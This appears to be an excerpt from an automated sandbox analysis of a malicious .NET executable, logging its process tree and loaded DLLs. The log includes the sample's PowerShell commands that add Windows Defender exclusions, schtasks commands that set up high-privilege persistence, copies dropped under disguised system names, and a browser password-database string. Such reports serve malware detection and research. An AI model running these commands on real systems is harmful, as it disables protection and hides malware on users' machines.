                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\grqPBzywzR.bat"
                            Source: Udzp7lL5ns.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: Udzp7lL5ns.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile read: C:\Users\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: v3jUukClLg.51.dr, fQmdBEQasM.51.dr, JkOmqKg6X7.51.dr, IuveakfRsf.51.dr, qsvDfYEAgo.51.dr, 2yBqTd0faR.51.dr, Us3P7WH1Hx.51.dr, qmQKzWmr2C.51.dr, JTmiUSmcAv.51.dr, VFqP1C0V8Z.51.dr, XlvFxONiFQ.51.dr, KSY0dGUJn9.51.dr, OMtD15XNm3.51.dr, KmzRcRM6PL.51.dr, QLjx71dLzS.51.dr, JVGHnLLBVa.51.dr, IELwmQXJfA.51.dr, ID83u0oOUU.51.dr, dMlU6MOAxP.51.dr, 7ILfmybrjj.51.dr, aVrU5jE58E.51.dr, myVEKtUkPj.51.dr, Su9xq20fwW.51.dr, j5QENk5kof.51.dr, M3MKfjiTDt.51.dr, 06siWx4sia.51.dr, Ut1YlPvwsa.51.dr, wTXpKBl1Zj.51.dr, msdhnthH4H.51.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: Udzp7lL5ns.exeVirustotal: Detection: 68%
                            Source: Udzp7lL5ns.exeReversingLabs: Detection: 65%
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile read: C:\Users\user\Desktop\Udzp7lL5ns.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\Udzp7lL5ns.exe "C:\Users\user\Desktop\Udzp7lL5ns.exe"
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2jonksck\2jonksck.cmdline"
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESED84.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2936DBF6B4C2EB0AEC72C42A91573.TMP"
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rm05dpm5\rm05dpm5.cmdline"
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEF49.tmp" "c:\Windows\System32\CSC98778A6FB9344578AD1F444CFDF09EF9.TMP"
                            Source: unknownProcess created: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe
                            Source: unknownProcess created: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe
                            Source: unknownProcess created: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exe C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exe
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "LaHYItspByFGQiJUMBgDGadpL" /sc MINUTE /mo 8 /tr "'C:\Windows\SystemTemp\Crashpad\reports\LaHYItspByFGQiJUMBgDGadp.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Udzp7lL5nsU" /sc MINUTE /mo 12 /tr "'C:\Users\user\Desktop\Udzp7lL5ns.exe'" /f
                            Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\Memory Compression.exe "C:\Program Files (x86)\windows mail\Memory Compression.exe"
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Udzp7lL5ns" /sc ONLOGON /tr "'C:\Users\user\Desktop\Udzp7lL5ns.exe'" /rl HIGHEST /f
                            Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\Memory Compression.exe "C:\Program Files (x86)\windows mail\Memory Compression.exe"
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\Memory Compression.exe'
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\LaHYItspByFGQiJUMBgDGadp.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SystemTemp\Crashpad\reports\LaHYItspByFGQiJUMBgDGadp.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Udzp7lL5ns.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\grqPBzywzR.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: unknownProcess created: C:\Users\user\Desktop\Udzp7lL5ns.exe C:\Users\user\Desktop\Udzp7lL5ns.exe
                            Source: unknownProcess created: C:\Users\user\Desktop\Udzp7lL5ns.exe C:\Users\user\Desktop\Udzp7lL5ns.exe
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Windows Mail\Memory Compression.exe "C:\Program Files (x86)\windows mail\Memory Compression.exe"
                            Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\Memory Compression.exe "C:\Program Files (x86)\windows mail\Memory Compression.exe"
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                            Source: unknownProcess created: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe "C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe"
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2jonksck\2jonksck.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rm05dpm5\rm05dpm5.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "LaHYItspByFGQiJUMBgDGadpL" /sc MINUTE /mo 8 /tr "'C:\Windows\SystemTemp\Crashpad\reports\LaHYItspByFGQiJUMBgDGadp.exe'" /rl HIGHEST /fJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Udzp7lL5nsU" /sc MINUTE /mo 12 /tr "'C:\Users\user\Desktop\Udzp7lL5ns.exe'" /fJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Udzp7lL5ns" /sc ONLOGON /tr "'C:\Users\user\Desktop\Udzp7lL5ns.exe'" /rl HIGHEST /fJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SystemTemp\Crashpad\reports\LaHYItspByFGQiJUMBgDGadp.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Udzp7lL5ns.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\grqPBzywzR.bat" Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESED84.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2936DBF6B4C2EB0AEC72C42A91573.TMP"Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEF49.tmp" "c:\Windows\System32\CSC98778A6FB9344578AD1F444CFDF09EF9.TMP"Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Windows Mail\Memory Compression.exe "C:\Program Files (x86)\windows mail\Memory Compression.exe"
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: dlnashext.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: wpdshext.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeSection loaded: wldp.dllJump to behavior
